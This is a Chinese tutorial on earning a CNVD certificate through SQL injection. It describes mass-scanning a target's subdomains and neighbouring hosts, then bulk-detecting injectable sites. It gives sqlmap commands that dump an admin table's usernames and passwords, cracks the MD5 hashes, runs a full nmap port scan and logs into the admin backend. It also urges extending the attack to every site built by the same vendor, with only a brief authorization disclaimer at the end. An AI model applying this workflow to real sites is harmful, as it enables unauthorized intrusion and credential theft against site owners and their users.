SQL注入漏洞挖掘与CNVD证书获取实战指南

1. 前言

本文详细记录了一个通过SQL注入漏洞获取CNVD证书的完整过程。CNVD（国家信息安全漏洞共享平台）是由国家计算机网络应急技术处理协调中心联合国内重要信息系统单位、基础电信运营商、网络安全厂商、软件厂商和互联网企业建立的信息安全漏洞信息共享知识库。

2. 漏洞挖掘流程

2.1 目标信息收集

1. 初始目标确定：选择一个目标网站作为起点（示例：http://www.XXX.com/_tw/index.html）

2. 域名扫描：

   • 使用御剑工具扫描目标域名
   • 将目标URL(http://www.XXX.com/)放入御剑工具左栏
   • 执行ping操作并扫描C类服务器
   • 获取所有二级域名

3. 结果导出：

   • 右键导出所有扫描到的URL到桌面

2.2 SQL注入漏洞检测

1. 使用超级SQL注入工具：

   • 将导出的URL导入工具中
   • 点击"爬行链接"等待爬行完成
   • 点击"扫描注入"获取结果

2. 结果分析：

   • 一个站点可能扫描出上百个存在注入漏洞的网站
   • 这些漏洞通常可被利用来获取后台数据和数据库访问权限

2.3 利用SQLMap进行深度利用

1. 数据库枚举：

   sqlmap -u "http://www.XXX.com/products_detail.php?id=17&cid=7" --dbs
   

2. 表枚举（以XXX_kun数据库为例）：

   sqlmap -u "http://www.XXX.com/products_detail.php?id=17&cid=7" -D XXX_kun --tables
   

3. 列枚举（以tcadmin表为例）：

   sqlmap -u "http://www.XXX.com/products_detail.php?id=17&cid=7" -D XXX_kun -T tcadmin --columns
   

4. 数据提取（获取username和passwd字段）：

   sqlmap -u "http://www.XXX.com/products_detail.php?id=17&cid=7" -D XXX_kun -T tcadmin -C username,passwd --dump
   

5. 密码解密：

   • 获取的密码通常是MD5加密的
   • 使用MD5解密工具进行解密

2.4 后台访问

1. 端口扫描：

   nmap -sT -sU -sV -O -P0 -p 1-65535 www.XXX.com
   

2. 后台登录：

   • 在扫描结果中找到开放的管理端口（示例：2096）
   • 构造后台URL：http://www.XXX.com:2096
   • 使用获取的管理员账号密码登录

3. 通用漏洞挖掘技巧

1. 寻找"Power By"信息：

   • 检查网站底部通常有"Power By XXXXX"的标识
   • XXXXX通常是网站制作方

2. 扩大漏洞范围：

   • 同一制作方开发的其他网站很可能存在相同漏洞
   • 检查制作方旗下所有站点
   • 若无漏洞，可尝试其子站点

4. CNVD报告撰写要点

1. 报告内容要求：

   • 详尽：包含所有关键步骤和发现
   • 实际：基于真实测试结果
   • 准确：数据必须精确无误

2. 附件准备：

   • 提供3-5个存在相同漏洞的站点证明
   • 包含漏洞验证的详细截图和数据

5. 工具清单

1. 御剑：用于域名扫描和二级域名发现
2. 超级SQL注入工具：批量检测SQL注入漏洞
3. SQLMap：高级SQL注入利用工具
4. Nmap：端口扫描和服务发现
5. MD5解密工具：用于密码破解

6. 注意事项

1. 本教程仅用于安全学习和研究目的
2. 未经授权测试他人系统属违法行为
3. 发现漏洞应遵循负责任的披露原则
4. 向CNVD提交漏洞前确保已获得测试授权

7. 总结

通过系统化的信息收集、漏洞扫描、深度利用和通用性验证，可以有效地发现和报告高危漏洞。关键在于：

• 不局限于单个站点，寻找通用性漏洞
• 使用自动化工具提高效率
• 详细记录每个步骤和发现
• 遵循规范的漏洞报告流程